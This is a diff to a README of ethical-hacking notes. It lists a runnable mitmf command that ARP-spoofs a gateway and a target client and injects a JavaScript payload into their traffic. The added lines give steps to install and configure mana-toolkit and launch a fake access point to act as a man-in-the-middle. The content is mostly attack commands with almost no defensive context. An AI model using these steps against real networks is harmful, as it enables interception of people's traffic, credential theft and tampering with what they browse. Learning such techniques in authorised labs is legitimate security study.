RodgerOliver/ethical-hacking/README.md

 ### Code Injection
 * Inject JS
   * `mitmf --arp --spoof --gateway <router IP> --target <target client IP> -i wlan0 --inject --js-payload "alert('hello from hacker')"`
+### Fake Access Point (Honeypot) to become the MITM
+* You need to have internet connection and a wireless card to broadcast it.
+  * `apt install mana-toolkit`
+* Edit the files bellow.
+Change the interface and the ssid.
+After change the upstream and the phy.
+  * `nano /etc/mana-toolkit/hostpad-mana.conf`
+  * `nano /usr/share/mana-toolkit/run-mana/start-nat-simple.sh`
+* Start the network
+  * `bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh`